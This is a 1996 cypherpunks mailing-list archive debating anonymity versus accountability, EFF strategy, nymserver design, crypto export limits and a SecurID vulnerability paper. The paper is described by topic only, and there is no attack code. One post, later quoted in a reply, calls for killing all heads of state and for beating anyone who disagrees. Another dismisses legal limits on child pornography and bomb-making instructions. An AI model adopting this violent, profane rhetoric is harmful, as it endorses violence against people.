| |PGP Public Key fingerprint: 9ACC4C28478018E1372DC06A9452A477/MIT Keyserver| |--------------------------------------------------------------------------| From qut at netcom.com Tue Sep 3 19:41:04 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 10:41:04 +0800 Subject: Voting Monarchist? In-Reply-To: Message-ID: <199609032341.QAA24172@netcom.netcom.com> ! > > Vote Monarchist ! > ! > who is the candidate? LaRouche? ! ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running ! for president. Anyone who doesn't advocate killing all kings, presidents, ! and prime ministers is a fucking statist and should be beaten to a pulp ! with a rattan stick. That's the problem with the Libertarians, they've got some sort of hang up about beatings. Must be some childhood difficulties. From jonl at well.com Tue Sep 3 19:50:49 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 10:50:49 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960903171629.0b172268@mail.well.com> At 01:22 AM 9/3/96 -0700, James A. Donald wrote: >At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: >> EFF in generally does not issue extremist position >> statements, but is careful to examine the risks as well as the benefits, >> and look for pro-liberty solutions to those risks. > >If the right to speak anonymously is an "extremist" position in the eyes >of the EFF, then they are no friends of liberty. > >It is hardly an "extremist" position outside of such countries as Cuba, >Iran, or China. > >It is the overwhelmingly mainstream position, not just among netizens, >but when last heard, amongst supreme court judges and ordinary people >in the street. Not necessarily. The character of the anonymous speech is decisive. If you use anonymity to cloak harassment, for instance, the anonymity (which removes accountability) is a problem. The accountability issue is real and should be addressed, not evaded. 
-- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From dlv at bwalk.dm.com Tue Sep 3 19:59:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 10:59:22 +0800 Subject: The Esther Dyson Flap In-Reply-To: <199609031719.KAA03089@mail.pacifier.com> Message-ID: jim bell writes: > At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: > >Esther Dyson says that anonymity on the Net can do more damage than > >anonymity in other forums, and thus may need to be regulated and restricted > >in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's > >term) has grown up with anonymity, and few people take the anonymous (or > >not) rants and charges made in the millions per day with the same degree of > >certainty they take print comments. Put another way, there is no clear and > >present danger. > > Indeed, I support the elimination of concepts such as "slander" and "libel" > precisely because they cause more harm than good. Currently, there is an > illusion among ordinary citizens that "if that was untrue, you could sue him > for libel!" despite the fact that this is rarely practical. In that way, > the law actually adds credibility to what should be an incredible claim. > Eliminate libel suits, and you've eliminated any presumption that because > it's been spoken or is in print, it's likely to be correct. The gubment has no right to fuck with any speech - (seditius) libel, child porn, bomb-making instructions... 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From stewarts at ix.netcom.com Tue Sep 3 20:02:13 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 11:02:13 +0800 Subject: Secure anonymouse server protocol: comments please Message-ID: <9609032156.AA05838@anchor.ho.att.com> At 07:24 PM 9/2/96 +0000, paul at fatmans.demon.co.uk wrote: >The following is a very sketchy plan for a secure protocol for an >anonymous server which allows replies without storing a recipient >database in the clear. Several people have talked about this sort of thing recently, including William Geiger, Doug Floyd, and myself. Lutz Donnerhacke's Jenaer Anonymous Service actually implements it (send it mail saying "help".) Rather than using a human-selected userid, it uses the PGP keyid to make IDs like anon-1a2b3c4d at as-node.jena.thur.de. >This system has 1 huge fault, we can encrypt a user's ID with the >server's public key to see what his ID in the encrypted database is >and therefore identify him, maybe we need two separate server public >keys, and when IDs come in encrypted with key1 (the one it releases) >it decrypts with secretkey1 then encrypts with publickey2 (the one it >keeps secret) If you encrypt the id using raw RSA and constant padding, this is a risk. If you encrypt it using PGP, which uses a random session key, it's not. If you encrypt it using raw RSA and pad the id with a random nonce, it's also no risk. In the latter two cases, the encrypted material is different every time, so you can't compare with previous messages. The Jenaer nymserver avoids this by using a remailer approach - you send an encrypted message with a Reply-To: header telling where to send the accumulated mail (which may, of course, be another nymserver), and it delivers it using mixmaster. This frees you to send your pickup requests by anonymous remailer as well. 
It's still not risk-free, since if Bad Guys crack the remailer or force the operator to operate it while they monitor it, they can see pickup requests, but it's far more difficult to do that than to just steal the box, and there's no database on the box that's useful to steal. Lutz does recommend chaining your Reply-To: to another nymserver, but it's already very secure. I don't remember if he gets fancy and requires the pickup requests to be signed by the key of the owner or not; the only difficulty with this is the syntax of PGP, which is "fixed in 3.0". Hal Finney has also suggested a system that, instead of delivering anonymous email to the recipient, sends a message saying "You have anonymous mail, receipt #123456. Send back this ticket to pick it up." and you can extend the syntax to handle automatic blocking requests and automatic deliver-everything requests. This is fairly easy to extend for anonymous mailboxes and datahaven code. I've wavered between the delete-on-retrieval model, which is fine for email and not very useful for samizdat, or the delete-after-some-time-period-or-request model, which is useful for both but makes it easy for users to turn you into the local pirate-warez-and-child-pornography server. If you extend the model and charge digicash for storage, it becomes a much cleaner solution. 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rwright at adnetsol.com Tue Sep 3 20:06:27 1996 From: rwright at adnetsol.com (Ross Wright) Date: Wed, 4 Sep 1996 11:06:27 +0800 Subject: their is a new mailing list Message-ID: <199609032335.QAA09136@adnetsol.adnetsol.com> > To: cypherpunks at toad.com > From: hack5 at juno.com (patrick b cummings) > Date: Tue, 03 Sep 1996 16:14:40 EDT > their is a new mailing list for all you hackers just email your name or > handle and e-mail address and youll be subscribed > send information to hack5 at juno.com > > Am I missing something here? Is this guy fucking crazy? =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From nobody at replay.com Tue Sep 3 20:08:13 1996 From: nobody at replay.com (Anonymous) Date: Wed, 4 Sep 1996 11:08:13 +0800 Subject: No Subject Message-ID: <199609032354.BAA29220@basement.replay.com> patrick b cummings wrote: > their is a new mailing list for all you > hackers > just email your name or handle and e-mail address and youll be subscribed > send information to hack5 at juno.com k00l d00de.... c'mon Varney, we know its you. From Ben at explorateur.quaternet.fr Tue Sep 3 20:21:51 1996 From: Ben at explorateur.quaternet.fr (Ben at explorateur.quaternet.fr) Date: Wed, 4 Sep 1996 11:21:51 +0800 Subject: No Subject Message-ID: <199609040016.BAA10030@explorateur.quaternet.fr> suscribe me From mech at eff.org Tue Sep 3 20:36:05 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:36:05 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031557.IAA28466@dns1.noc.best.net> Message-ID: <199609032202.PAA29704@eff.org> > But we do not want legislation, so we do not want to help write legislation. 
> > We want to delay legislation for as long as possible, for the longer the > delay, the more the balance of power favors the net and disfavors the pols. > > Therefore the correct strategy is simply to attack any politician who shows > any interest in legislating on our issues. > > We have no friends on Capitol hill, and if we did have friends, it would > still be necessary to denounce them as enemies. I agree with the general sentiment behind this, but I think it may go a bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE (the two crypto bills now floating around in Congress). On the surface they both appear to threaten the viability of the Bernstein, Karn and Junger cases, but in reality neither of these bills has a chance in hell of passage. "What's the point then?", you may ask. They slow down the Administration, which is pushing *very* hard and fast to get GAK adopted internationally, and to get US software companies to knuckle in to GAK in exchange for slightly relaxed export controls. Make a lot of noise about the bills, and you screw up the administration's plans, since they have to divert at least some energy to fending the bills off or they *will* pass. You do that, but keep the legal staff working solely on the cases, and you have more breathing room to get the cases through the Supreme Court before it's too late. And, in the event you lose the cases, you still have slightly less than a chance in hell of getting one of the bills passed and salvaging *something*, or simultaneously or alternately, just deploying more crypto tech such as S/WAN (which EFF is committed to as of the most recent board meeting), since the Administration has been slowed down. The more tech deployment you have, the more irrelevant the Administration's noises are. The point being: Don't let disgust of a process or thing deter you from milking that process or thing of all it is worth, provided you sacrifice nothing significant in the process. 
It has to be a judgement call. On some other issues this tactic does not work. Any legislation about porn on the Net needs to be slammed down, because any such legislation will get gutted by theocrats and turned into a censorship bill, as an example. Choose action based on careful thinking, not kneejerk reaction, that's my motto, for what it may be worth. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From declan at eff.org Tue Sep 3 20:41:40 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 4 Sep 1996 11:41:40 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031737.KAA20451@netcom2.netcom.com> Message-ID: V.Z. Nuri, please watch your attributions. I don't recall making any claims about "ghettoization" of anonymity. -Declan On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote: > what cpunks might consider doing is creating an alternative message > distribution system like Usenet that starts from the premise that > anonymous communication is allowed and trying to grow it. > > btw, McCullagh's and other's claims about "ghettoization" of > anonymity strike me as very specious. as long as people can use > anonymity in some forum they want, I think that's acceptable. what's > the equivalent of a "ghetto" in cyberspace? you can't go into > a meeting of professionals wearing a ski mask, although you might > be able to create such a forum yourself. does that mean you are > in some kind of a "ghetto"? oh, brother. // declan at eff.org // I do not represent the EFF // declan at well.com // From mech at eff.org Tue Sep 3 20:45:09 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:45:09 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609040057.RAA01205@mail.pacifier.com> Message-ID: <199609040104.SAA06261@eff.org> > >The accountability issue is real and > >should be addressed, not evaded. > > "Addressed", maybe, but that doesn't necessarily mean, "solved." For many > decades, people have been able to walk up to a pay telephone at 3:00 AM and > make a harassing phone call to somebody, a "problem" which still exists and > no solution is being implemented for. Yes! Exactly! Of course! Precisely the example that has come up in EFF's own statements on anonymity (which, in absence of a policy on the topic have been strictly factual, reporting both sides of the issue). 
> I think it's reasonable to come to the conclusion that there is no solution > to the anonymity "problem" that isn't worse than the underlying anonymity. That's a common view here, to say the least. And it's one with which I am in 100% agreement. > And, BTW, I don't consider a pro-anonymity position to be an extremist one. We don't either, even those of us with questions and conundrums to think about. I do think it's extremist to not be willing to even address the questions and conundrums, but we're in agreement on that, so not much to argue about, fortunately. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From winsock at c2.net Tue Sep 3 20:45:10 1996 From: winsock at c2.net (WinSock Remailer) Date: Wed, 4 Sep 1996 11:45:10 +0800 Subject: Pseudocrypto detector is going wild Message-ID: <199609040024.RAA14142@infinity.c2.org> Is it just me, or is the snake-oil frequency factor scaling up? We used to get this stuff quarterly, and now it's monthly, if not weekly! slither-squeek I think enquirer must be overloaded with ammo, and I am sure in the mood for it now. me From peiterz at secnet.com Tue Sep 3 20:46:36 1996 From: peiterz at secnet.com (Peiter Z) Date: Wed, 4 Sep 1996 11:46:36 +0800 Subject: SecurID White Paper Message-ID: <199609041738.LAA01411@silence.secnet.com> SecurID Vulnerabilities White-Paper Due to increased recent interest that has been witnessed on the net about the SecurID token cards and potential vulnerabilities with their use, we offer a white paper on some of the vulnerabilities that we believe have been witnessed and/or speculated upon. This paper is being put forth into the public domain by Secure Networks Incorporated and is available at the following URL : ftp://ftp.secnet.com/pub/papers/securid.ps Topics dealt with in the paper include: . Race attacks based upon fixed length responses (still valid even with the current patch) . Denial of Service attacks based upon server patches . Server - Slave separation and replay attacks . Vulnerabilities in the communications with the ACE Server . A quick analysis of the communications with the ACE Server . Problems with out-of-band authentication We hope this paper provides insight, enlightenment, and is helpful to the security community in general. thanks and enjoy, Secure Networks Inc. From jimbell at pacifier.com Tue Sep 3 20:54:31 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 11:54:31 +0800 Subject: What is the EFF doing exactly? 
Message-ID: <199609040057.RAA01205@mail.pacifier.com> At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >At 01:22 AM 9/3/96 -0700, James A. Donald wrote: >>At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: >>> EFF in generally does not issue extremist position >>> statements, but is careful to examine the risks as well as the benefits, >>> and look for pro-liberty solutions to those risks. >> >>If the right to speak anonymously is an "extremist" position in the eyes >>of the EFF, then they are no friends of liberty. >> >>It is hardly an "extremist" position outside of such countries as Cuba, >>Iran, or China. >> >>It is the overwhelmingly mainstream position, not just among netizens, >>but when last heard, amongst supreme court judges and ordinary people >>in the street. > >Not necessarily. The character of the anonymous speech is decisive. If you >use anonymity to cloak harassment, for instance, the anonymity (which >removes accountability) is a problem. The accountability issue is real and >should be addressed, not evaded. "Addressed", maybe, but that doesn't necessarily mean, "solved." For many decades, people have been able to walk up to a pay telephone at 3:00 AM and make a harassing phone call to somebody, a "problem" which still exists and no solution is being implemented for. I think it's reasonable to come to the conclusion that there is no solution to the anonymity "problem" that isn't worse than the underlying anonymity. And, BTW, I don't consider a pro-anonymity position to be an extremist one. Jim Bell jimbell at pacifier.com From mech at eff.org Tue Sep 3 20:56:11 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 11:56:11 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.16.19960903152037.58cfc590@mail.well.com> Message-ID: <199609040019.RAA04643@eff.org> > Compromise is not necessarily a bad thing; without some give and take, we > sorta run right over each other. 
OTOH, I do agree that a strong position is > necessary at this juncture. Certainly. EFF regularly compromises with our allies, e.g. on who will run a particular web page, what a campaign icon will look like, where an event will be held, etc. We're just not in the habit of compromising on legislation, since we are not in a position to give or sell anything, particularly the rights of the public and of individual citizens. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist

From ddfr at best.com Tue Sep 3 21:03:26 1996
From: ddfr at best.com (david friedman)
Date: Wed, 4 Sep 1996 12:03:26 +0800
Subject: Schelling Points, Rights, and Game Theory--My article
Message-ID:

Tim May mentioned my article on this subject. It is:

"A Positive Account of Property Rights," Social Philosophy and Policy 11 No. 2 (Summer 1994) pp. 1-16.

It can be found from the academic part of my web page:

http://www.best.com/~ddfr/Academic/Academic.html

David Friedman

From mech at eff.org Tue Sep 3 21:33:13 1996
From: mech at eff.org (Stanton McCandlish)
Date: Wed, 4 Sep 1996 12:33:13 +0800
Subject: EDyson CPF 95 item
Message-ID: <199609040140.SAA07236@eff.org>

If anyone does dig that up, please bounce one my way, so I can add it to the archives. Any other good stuff from that CFP would be of value too. Ditto for CFP96. I think the newest CFP transcripts we have are 94.

-- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist

From drose at AZStarNet.com Tue Sep 3 22:07:14 1996
From: drose at AZStarNet.com (David M. Rose)
Date: Wed, 4 Sep 1996 13:07:14 +0800
Subject: Voting Monarchist?
Message-ID: <199609032306.QAA26604@web.azstarnet.com>

Dimitri, err, Dr. Vulis, or is that Dr. Nuri?,

Relax! The modern cure for hydrophobia is a great deal less painful than what it was in the past

>Harry Brone is a fucking statist. If he weren't, he wouldn't be running
>for president. Anyone who doesn't advocate killing all kings, presidents,
>and prime ministers is a fucking statist and should be beaten to a pulp
>with a rattan stick.

From ichudov at algebra.com Tue Sep 3 22:10:31 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Wed, 4 Sep 1996 13:10:31 +0800
Subject: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To:
Message-ID: <199609032225.RAA07933@manifold.algebra.com>

Timothy C. May wrote:
> At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote:
> >::
> >Request-Remailing-To: remailer at huge.cajones.com
> >::
> >Request-Remailing-To: remailer at remailer.nl.com
> ....
> >::
> >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod)
> >Deep Throat.
>
>
> Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines!
> At least now we know who the _other_ "Unicorn" is.

Which brings up the following question: what is the role of human screwups in cryptosecurity? How "foolproof" (no pun intended) should be remailer clients? How can we prevent people from forgetting to delete unencrypted files after encryption?

Alternatively, let's think about this: premail always fingers a certain user account at berkeley.edu to obtain remailer keys. Suppose that Joe DrugUser uses remailers to talk to his Colombian friends and the government wants to find out what he is doing. They could just break into the computer at berkeley.edu and replace keys with the government-provided keys.
They could even modify the finger server so that it would be lying only to Joe's computer and would work just as before for all others (to prevent detection). The government would then intercept Joe's communications and decrypt them. - Igor. From stewarts at ix.netcom.com Tue Sep 3 22:27:56 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 13:27:56 +0800 Subject: rc2 export limits.. Message-ID: <199609040252.TAA11495@toad.com> At 10:33 AM 9/3/96 -0700, you wrote: >Hi, Does anyone know the export limit for RC2 Key size ? As with any other crypto system, the rule is "you need to get the NSA's permission, which they'll give if they feel like", rather than any well-defined rule you can depend on. However, the usual guidelines for systems like RC2 and RC4 is 40-bit keys, and RSA keys up to 512 bits for encrypting session keys and 1024 bits for signatures, plus you have to structure the code so people can't easily modify it or use it to triple-encrypt in ways that make the triple-encrypted version stronger than 40 bits. Also, if you're using Real RC2, you may need permission from RSA Data Systems, Inc.. If you're just using the algorithm that came out on the net that looks suspiciously like RC2, you may or may not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Tue Sep 3 22:35:40 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 13:35:40 +0800 Subject: What is the EFF doing exactly? Message-ID: At 1:56 AM 9/4/96, jim bell wrote: >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>Not necessarily. The character of the anonymous speech is decisive. If you >>use anonymity to cloak harassment, for instance, the anonymity (which >>removes accountability) is a problem. The accountability issue is real and >>should be addressed, not evaded. > >"Addressed", maybe, but that doesn't necessarily mean, "solved." 
For many >decades, people have been able to walk up to a pay telephone at 3:00 AM and >make a harassing phone call to somebody, a "problem" which still exists and >no solution is being implemented for. > >I think it's reasonable to come to the conclusion that there is no solution >to the anonymity "problem" that isn't worse than the underlying anonymity. >And, BTW, I don't consider a pro-anonymity position to be an extremist one. I agree, of course. There is absolutely nothing about "speech" that is tied to "accountability." And various Supreme Court decisions have emphasized this. (Pay special attention to the quote from Greg Broiles I included in my section from my Cyphernomicon I just posted to the list.) Think about it. Anyone may say pretty much anything they wish (modulo the usual exceptions of certain forms of obscenity, shouting "Fire!," etc....and even these are enforced ex post facto). Once a speech act occurs and some criminal prosecution results, the cops can try to catch the speaker. But if they can't, they can't. We don't require that speech only be done in a way that illegal speakers may be held "accountable." The fact that certain classes of speakers are indeed held accountable is more a function of the particular details of the way they spoke and the nature of society than it is that there is a rule that "all speech must involve accountability." We hold the author of an article in "The Washington Post" more liable for insulting speech than we do the guy in the neighborhood gym, even if they both say the same words. The issue is clearly not that "all speech must involve accountability," as many forms of speech are not. (I'd say the meta-issue is "You can drag someone into court if you can catch them. But if you can't catch them, you can't. 
And we're not going to limit speech just to make it easier to catch speakers you may wish to haul into court.") As Jim and so many others have noted, anonymous phone calls, anonymous postal mail, whispering campaigns, speech in private homes, etc., are all examples where accountability is extremely difficult or impossible to enforce. We even have names for these things: anonymous threats, poison pen letters, ransom demands, gossip, etc. Saying that speech on the Net may need to be restricted so as to ensure "accountability" is a serious step in the direction of requiring credentialling of all speakers, key escrow, and limits on remailers. Given that so many other types of speech are given anonymity protection, why? The reason this is such a hot button for Cypherpunks is that "responsible freedom" and "accountability" are often code words for controlling some very basic freedoms. Placing limits on anonymous speech would involve some very fundamental restrictions on freedoms of various sorts. Even if "safeguards" are built-in, the effect would almost certainly be to illegalize remailers (unless they had "escrow" features!). And a wide array of other freedoms, too numerous for me to write about here. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Tue Sep 3 22:46:48 1996 From: tcmay at got.net (Timothy C. 
May)
Date: Wed, 4 Sep 1996 13:46:48 +0800
Subject: Anonymity (re: the Esther Dyson issue)
Message-ID:

The latest debate about "anonymity" and its hazards is bringing up charges that we Cypherpunks are not taking Esther Dyson's concerns seriously enough.

I strongly disagree. The various downsides of anonymity, pseudonymity/pseudoanonymity, lack of accountability, etc., have been hashed out in literally *thousands* of posts over the past four years! Many of us have written long articles dealing with these issues, and referring in great detail to mechanisms for dealing with "obnoxious speech," "defamatory speech," "anonymous mailbombs," "anonymous threats," etc.

Rather than dredge up my own articles, or those of the many others who have addressed most or all of the concerns most often raised, I'll post here one of the subsections from my Cyphernomicon. This is just one of the subsections in the entire _chapter_ devoted to issues of anonymity, mixes, and remailers.

(For those not familiar with the style of my Cyphernomicon, I used a powerful outline processor (MORE) to build a skeleton, attach threads and ideas, move things around, clone headings in more than one place, etc. For a large writing project of this sort, an outline processor is almost a necessity. At least for me. The points are often short and are sometimes incomplete; fleshing the whole thing out into well-written expository prose would've taken an additional several months of full-time effort. This form gets the points across.)

(A few subsubsections are deleted, to save space.)

Cyphernomicon 8.3 Anonymity, Digital Mixes, and Remailers: Anonymity and Digital Pseudonyms

8.3.1. Why is anonymity so important?
- It allows escape from past, an often-essential element of straightening out (an important function of the Western frontier, the French Foreign Legion, etc., and something we are losing as the dossiers travel with us wherever we go)
- It allows new and diverse types of opinions, as noted below
- More basically, anonymity is important because identity is not as important as has been made out in our dossier society. To wit, if Alice wishes to remain anonymous or pseudonymous to Bob, Bob cannot "demand" that she provide her "real" name. It's a matter of negotiation between them. (Identity is not free...it is a credential like any other and cannot be demanded, only negotiated.)
- Voting, reading habits, personal behavior...all are examples where privacy (= anonymity, effectively) are critical. The next section gives a long list of reasons for anonymity.

8.3.2. What's the difference between anonymity and pseudonymity?
+ Not much, at one level...we often use the term "digital pseudonym" in a strong sense, in which the actual identity cannot be deduced easily
- this is "anonymity" in a certain sense
- But at another level, a pseudonym carries reputations, credentials, etc., and is _not_ "anonymous"
- people use pseudonyms sometimes for whimsical reasons (e.g., "From spaceman.spiff at calvin.hobbes.org Sep 6, 94 06:10:30"), sometimes to keep different mailing lists separate (different personas for different groups), etc.

8.3.3. Downsides of anonymity
- libel and other similar dangers to reputations
+ hit-and-runs actions (mostly on the Net)
+ on the other hand, such rantings can be ignored (KILL file)
- positive reputations
- accountability based on physical threats and tracking is lost
+ Practical issue. On the Cypherpunks list, I often take "anonymous" messages less seriously.
- They're often more bizarre and inflammatory than ordinary posts, perhaps for good reason, and they're certainly harder to take seriously and respond to. This is to be expected.
(I should note that some pseudonyms, such as Black Unicorn and Pr0duct Cypher, have established reputable digital personas and are well worth replying to.)
- repudiation of debts and obligations
+ infantile flames and run-amok postings
- racism, sexism, etc.
- like "Rumormonger" at Apple?
- but these are reasons for pseudonym to be used, where the reputation of a pseudonym is important
+ Crimes...murders, bribery, etc.
- These are dealt with in more detail in the section on crypto anarchy, as this is a major concern (anonymous markets for such services)

8.3.4. "How will privacy and anonymity be attacked?"
- the downsides just listed are often cited as a reason we can't have "anonymity"
- like so many other "computer hacker" items, as a tool for the "Four Horsemen": drug-dealers, money-launderers, terrorists, and pedophiles.
- as a haven for illegal practices, e.g., espionage, weapons trading, illegal markets, etc.
+ tax evasion ("We can't tax it if we can't see it.")
- same system that makes the IRS a "silent partner" in business transactions and that gives the IRS access to--and requires--business records
+ "discrimination"
- that it enables discrimination (this _used_ to be OK)
- exclusionary communities, old boy networks

8.3.5. "How will random accusations and wild rumors be controlled in anonymous forums?"
- First off, random accusations and hearsay statements are the norm in modern life; gossip, tabloids, rumors, etc. We don't worry obsessively about what to do to stop all such hearsay and even false comments. (A disturbing trend has been the tendency to sue, or threaten suits. And increasingly the attitude is that one can express _opinions_, but not make statements "unless they can be proved." That's not what free speech is all about!)
- Second, reputations matter. We base our trust in statements on a variety of things, including: past history, what others say about veracity, external facts in our possession, and motives.

8.3.6. "What are the legal views on anonymity?"
+ Reports that Supreme Court struck down a Southern law requiring pamphlet distributors to identify themselves. (I don't have a cite on this.)
- However, Greg Broiles provided this quote, from _Talley v. State of California_, 362 U.S. 60, 64-65, 80 S.Ct. 536, 538-539 (1960): "Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all." Greg adds: "It later says "Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes." [Greg Broiles, 1994-04-12]
+ And certainly many writers, journalists, and others use pseudonyms, and have faced no legal action.
- Provided they don't use it to evade taxes, evade legal judgments, commit fraud, etc.
- I have heard (no cites) that "going masked for the purpose of going masked" is illegal in many jurisdictions. Hard to believe, as many other disguises are just as effective and are presumably not outlawed (wigs, mustaches, makeup, etc.). I assume the law has to do with people wearing ski masks and such in "inappropriate" places. Bad law, if real.

8.3.7. Some Other Uses for Anonymous Systems:
+ Groupware and Anonymous Brainstorming and Voting
- systems based on Lotus Notes and designed to encourage wild ideas, comments from the shy or overly polite, etc.
- these systems could initially start in meeting and then be extended to remote sites, and eventually to nationwide and international forums
- the NSA may have a heart attack over these trends...
+ "Democracy Wall" for encrypted messages
- possibly using time-delayed keys (where even the public key, for reading the plaintext, is not distributed for some time)
- under the cover of an electronic newspaper, with all of the constitutional protections that entails: letters to the editor can be anonymous, ads need not be screened for validity, advertising claims are not the responsibility of the paper, etc.
+ Anonymous reviews and hypertext (for new types of journals)
+ the advantages
- honesty
- increased "temperature" of discourse
+ disadvantages
- increased flames
- intentional misinformation
+ Store-and-forward nodes
- used to facilitate the anonymous voting and anonymous inquiry (or reading) systems
- Chaum's "mix"
+ telephone forwarding systems, using digital money to pay for the service
- and TRMs?

...

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From declan at well.com Tue Sep 3 22:48:11 1996
From: declan at well.com (Declan McCullagh)
Date: Wed, 4 Sep 1996 13:48:11 +0800
Subject: Save the Howitzers (was Re: The Esther Dyson Flap)
Message-ID:

TCM wrote:

>And please spare us the "save the howitzers" comment. We talk about what
>concerns us. As it happens, our political opponents don't read our words,
>whereas a bunch of EFF board members apparently do, and so our criticisms
>here may cause EFF to actually confront the issue of anonymity and decide
>where they actually stand.

I think Tim's comments are generally on-point.
EFF board members are paying attention to discussions on the cypherpunks list and the organization would appear to be moving in a direction that will result in a solid pro-anonymity policy.

For reference, EPIC's position is:

"Our position is that we strongly support anonymity both for speech and for transactions. The right to anonymous speech is a constitutionally protected right (Talley v. California, McIntyre v. Ohio) and we believe that it equally applies in cyberspace. Anonymous transactions are a key way (and perhaps the only way that really works) to provide privacy on the net."

CDT's current position is:

"CDT believes that anonymous political speech is protected under the first amendment and would oppose any effort to restrict or curtail it on the Net."

-Declan

From jamesd at echeque.com Tue Sep 3 22:52:22 1996
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 4 Sep 1996 13:52:22 +0800
Subject: What is the EFF doing exactly?
Message-ID: <199609040334.UAA19232@dns1.noc.best.net>

At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
> Not necessarily. The character of the anonymous speech is decisive. If you
> use anonymity to cloak harassment, for instance, the anonymity (which
> removes accountability) is a problem. The accountability issue is real and
> should be addressed, not evaded.

No: The harassment is the problem, not the anonymity that makes it possible.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From mpd at netcom.com Tue Sep 3 22:53:21 1996
From: mpd at netcom.com (Mike Duvos)
Date: Wed, 4 Sep 1996 13:53:21 +0800
Subject: The Esther Dyson Flap
In-Reply-To:
Message-ID: <199609040316.UAA27856@netcom16.netcom.com>

Timothy C.
May writes:

> Indeed, I support the elimination of concepts such as
> "slander" and "libel" precisely because they cause more harm
> than good. Currently, there is an illusion among ordinary
> citizens that "if that was untrue, you could sue him for
> libel!" despite the fact that this is rarely practical. In
> that way, the law actually adds credibility to what should
> be an incredible claim. Eliminate libel suits, and you've
> eliminated any presumption that because it's been spoken or
> is in print, it's likely to be correct.

Reputation performs this function very well, and without expensive litigation. That is why there is really no clear and present danger posed by inaccurate information on the Net.

Governments shield themselves far better by promoting conspiracy theory as a recreational activity than they ever could by prosecuting people who expose their activities. Drowning signal in noise effectively obscures it without lending credence to material one cannot easily debunk.

As they say on X-Files, "The Truth is Out There..." (Somewhere)

--
Mike Duvos       $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger.                   $

From geeman at best.com Tue Sep 3 22:53:23 1996
From: geeman at best.com (geeman at best.com)
Date: Wed, 4 Sep 1996 13:53:23 +0800
Subject: Is Knuth's _AoCP_ still the authority on PRNG?
Message-ID: <01BB99D9.9A115240@geeman.vip.best.com>

check out "On the Efficient Generation of Cryptographic Confusion and Diffusion Sequences"

I may have gotten the title less than perfect. AltaVista will find it for you if you try. Excellent piece.

----------
From: eli+ at gs160.sp.cs.cmu.edu[SMTP:eli+ at gs160.sp.cs.cmu.edu]
Sent: Tuesday, September 03, 1996 7:54 PM
To: coderpunks at toad.com
Subject: Re: Is Knuth's _AoCP_ still the authority on PRNG?

Bryce writes:
